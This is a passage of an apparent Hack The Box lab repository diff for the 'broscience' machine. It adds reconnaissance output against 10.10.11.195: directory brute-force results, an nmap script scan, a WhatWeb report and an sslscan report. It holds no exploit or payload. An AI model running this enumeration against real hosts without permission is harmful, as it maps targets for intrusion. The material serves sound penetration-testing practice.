301 GET 9l 28w 317c https://10.10.11.195/includes => https://10.10.11.195/includes/
200 GET 147l 510w 0c https://10.10.11.195/index.php
301 GET 9l 28w 319c https://10.10.11.195/javascript => https://10.10.11.195/javascript/
200 GET 45l 104w 2161c https://10.10.11.195/register.php
302 GET 0l 0w 0c https://10.10.11.195/logout.php => https://10.10.11.195/index.php
301 GET 9l 28w 315c https://10.10.11.195/manual => https://10.10.11.195/manual/
403 GET 9l 28w 278c https://10.10.11.195/server-status
301 GET 9l 28w 315c https://10.10.11.195/styles => https://10.10.11.195/styles/
302 GET 1l 3w 13c https://10.10.11.195/update_user.php => https://10.10.11.195/login.php
200 GET 28l 71w 1322c https://10.10.11.195/exercise.php
200 GET 3l 7w 44c https://10.10.11.195/styles/light.css
200 GET 29l 70w 1309c https://10.10.11.195/user.php
200 GET 1l 4w 39c https://10.10.11.195/includes/img.php
200 GET 42l 97w 1936c https://10.10.11.195/login.php
200 GET 147l 510w 0c https://10.10.11.195/
403 GET 9l 28w 278c https://10.10.11.195/.html
403 GET 9l 28w 278c https://10.10.11.195/.php
403 GET 9l 28w 278c https://10.10.11.195/.hta
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd
403 GET 9l 28w 278c https://10.10.11.195/.hta.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.txt
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.txt
403 GET 9l 28w 278c https://10.10.11.195/.hta.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.html
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.html
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.php
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.php
403 GET 9l 28w 278c https://10.10.11.195/.hta.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.asp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.asp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.aspx
403 GET 9l 28w 278c https://10.10.11.195/.hta.aspx
403 GET 9l 28w 278c https://10.10.11.195/.hta.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htpasswd.jsp
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.aspx
403 GET 9l 28w 278c https://10.10.11.195/.htaccess.jsp
200 GET 28l 66w 1256c https://10.10.11.195/activate.php
302 GET 1l 3w 13c https://10.10.11.195/comment.php => https://10.10.11.195/login.php
301 GET 9l 28w 315c https://10.10.11.195/images => https://10.10.11.195/images/
301 GET 9l 28w 317c https://10.10.11.195/includes => https://10.10.11.195/includes/
200 GET 147l 510w 0c https://10.10.11.195/index.php
301 GET 9l 28w 319c https://10.10.11.195/javascript => https://10.10.11.195/javascript/
200 GET 45l 104w 2161c https://10.10.11.195/register.php
302 GET 0l 0w 0c https://10.10.11.195/logout.php => https://10.10.11.195/index.php
301 GET 9l 28w 315c https://10.10.11.195/manual => https://10.10.11.195/manual/
403 GET 9l 28w 278c https://10.10.11.195/server-status
301 GET 9l 28w 315c https://10.10.11.195/styles => https://10.10.11.195/styles/
302 GET 1l 3w 13c https://10.10.11.195/update_user.php => https://10.10.11.195/login.php

220
HTB/broscience/results/scans/tcp443/tcp_443_https_nmap.txt Normal file
View File

@@ -0,0 +1,220 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 443 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.030s latency).
Scanned at 2023-02-01 17:50:14 CET for 352s
PORT STATE SERVICE REASON VERSION
443/tcp open http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
| ssl-enum-ciphers:
| TLSv1.0:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.1:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.2:
| ciphers:
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CCM (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_CCM_8 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CCM (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_CCM_8 (dh 3072) - A
| TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 3072) - A
| TLS_DHE_RSA_WITH_ARIA_128_GCM_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_ARIA_256_GCM_SHA384 (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 3072) - A
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 (dh 3072) - A
| TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (dh 3072) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 (secp256r1) - A
| TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (secp256r1) - A
| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CCM (rsa 4096) - A
| TLS_RSA_WITH_AES_128_CCM_8 (rsa 4096) - A
| TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CCM (rsa 4096) - A
| TLS_RSA_WITH_AES_256_CCM_8 (rsa 4096) - A
| TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 4096) - A
| TLS_RSA_WITH_ARIA_128_GCM_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_ARIA_256_GCM_SHA384 (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 4096) - A
| TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 (rsa 4096) - A
| compressors:
| NULL
| cipher preference: client
| warnings:
| Key exchange (dh 3072) of lower strength than certificate key
| Key exchange (secp256r1) of lower strength than certificate key
| TLSv1.3:
| ciphers:
| TLS_AKE_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A
| TLS_AKE_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A
| TLS_AKE_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A
| cipher preference: client
|_ least strength: A
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-server-header: Apache/2.4.54 (Debian)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-feed: Couldn't find any feeds.
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-vhosts:
|_128 names had status 400
|_http-date: Wed, 01 Feb 2023 16:50:48 GMT; +1s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-mobileversion-checker: No mobile version detected.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=broscience.htb
| Found the following error pages:
|
| Error Code: 400
|_ http://broscience.htb:443/
|_ssl-date: TLS randomness does not represent time
|_http-chrono: Request times for /; avg: 260.46ms; min: 153.74ms; max: 364.01ms
|_http-comments-displayer: Couldn't find any comments.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| http-headers:
| Date: Wed, 01 Feb 2023 16:50:51 GMT
| Server: Apache/2.4.54 (Debian)
| Content-Length: 458
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
|
|_ (Request type: GET)
|_http-malware-host: Host appears to be clean
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-security-headers:
| Strict_Transport_Security:
|_ HSTS not configured in HTTPS Server
| http-useragent-tester:
| Status for browser useragent: 400
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-title: 400 Bad Request
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:56:06 2023 -- 1 IP address (1 host up) scanned in 352.25 seconds

BIN
HTB/broscience/results/scans/tcp443/tcp_443_https_screenshot.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 17 MiB

42
HTB/broscience/results/scans/tcp443/tcp_443_https_whatweb.txt Normal file
View File

@@ -0,0 +1,42 @@
WhatWeb report for https://10.10.11.195:443
Status : 200 OK
Title : BroScience : Home
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Cookies[PHPSESSID], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], Script
Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:21 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=jqrq19g4giei6rge5n6qucmp5u; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1418
Connection: close
Content-Type: text/html; charset=UTF-8

215
HTB/broscience/results/scans/tcp443/tcp_443_sslscan.html Normal file
View File

@@ -0,0 +1,215 @@
Version: 2.0.15-static
OpenSSL 1.1.1q-dev xx XXX xxxx
Connected to 10.10.11.195
Testing SSL server 10.10.11.195 on port 443 using SNI name 10.10.11.195
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 enabled
TLSv1.1 enabled
TLSv1.2 enabled
TLSv1.3 enabled
TLS Fallback SCSV:
Connection failed - unable to determine TLS Fallback SCSV support
TLS renegotiation:
Session renegotiation not supported
TLS Compression:
Compression disabled
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s):
Preferred TLSv1.3 128 bits TLS_AES_128_GCM_SHA256 Curve 25519 DHE 253
Accepted TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve 25519 DHE 253
Accepted TLSv1.3 256 bits TLS_CHACHA20_POLY1305_SHA256 Curve 25519 DHE 253
Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-CHACHA20-POLY1305 DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-CCM8 DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-AES256-CCM DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-ARIA256-GCM-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-ARIA256-GCM-SHA384 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-CCM8 DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-AES128-CCM DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-ARIA128-GCM-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-ARIA128-GCM-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-CAMELLIA256-SHA384 Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-CAMELLIA128-SHA256 Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA256 DHE 3072 bits
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.2 256 bits AES256-GCM-SHA384
Accepted TLSv1.2 256 bits AES256-CCM8
Accepted TLSv1.2 256 bits AES256-CCM
Accepted TLSv1.2 256 bits ARIA256-GCM-SHA384
Accepted TLSv1.2 128 bits AES128-GCM-SHA256
Accepted TLSv1.2 128 bits AES128-CCM8
Accepted TLSv1.2 128 bits AES128-CCM
Accepted TLSv1.2 128 bits ARIA128-GCM-SHA256
Accepted TLSv1.2 256 bits AES256-SHA256
Accepted TLSv1.2 256 bits CAMELLIA256-SHA256
Accepted TLSv1.2 128 bits AES128-SHA256
Accepted TLSv1.2 128 bits CAMELLIA128-SHA256
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 256 bits CAMELLIA256-SHA
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.2 128 bits CAMELLIA128-SHA
Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 256 bits CAMELLIA256-SHA
Accepted TLSv1.1 128 bits AES128-SHA
Accepted TLSv1.1 128 bits CAMELLIA128-SHA
Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253
Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 3072 bits
Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 3072 bits
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 3072 bits
Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 3072 bits
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 256 bits CAMELLIA256-SHA
Accepted TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Server Key Exchange Group(s):
TLSv1.3 128 bits secp256r1 (NIST P-256)
TLSv1.3 192 bits secp384r1 (NIST P-384)
TLSv1.3 260 bits secp521r1 (NIST P-521)
TLSv1.3 128 bits x25519
TLSv1.3 224 bits x448
TLSv1.2 128 bits secp256r1 (NIST P-256)
TLSv1.2 192 bits secp384r1 (NIST P-384)
TLSv1.2 260 bits secp521r1 (NIST P-521)
TLSv1.2 128 bits x25519
TLSv1.2 224 bits x448
SSL Certificate:
Certificate blob:
-----BEGIN CERTIFICATE-----
MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
dfC1SCd82A==
-----END CERTIFICATE-----
Version: 2
Serial Number: 0f:ea:a9:2b:4f:28:07:d2:a7:83:59:a9:de:62:31:9c:ed:b5:fa:ce
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=AT/L=Vienna/O=BroScience/CN=broscience.htb/emailAddress=administrator@broscience.htb
Not valid before: Jul 14 19:48:36 2022 GMT
Not valid after: Jul 14 19:48:36 2023 GMT
Subject: /C=AT/L=Vienna/O=BroScience/CN=broscience.htb/emailAddress=administrator@broscience.htb
Public Key Algorithm: NULL
RSA Public Key: (4096 bit)
RSA Public-Key: (4096 bit)
Modulus:
00:a7:32:5f:61:3f:7b:c0:6a:c9:15:3a:16:82:8e:
5a:85:85:26:8e:a7:2c:78:4a:07:4c:0d:82:63:eb:
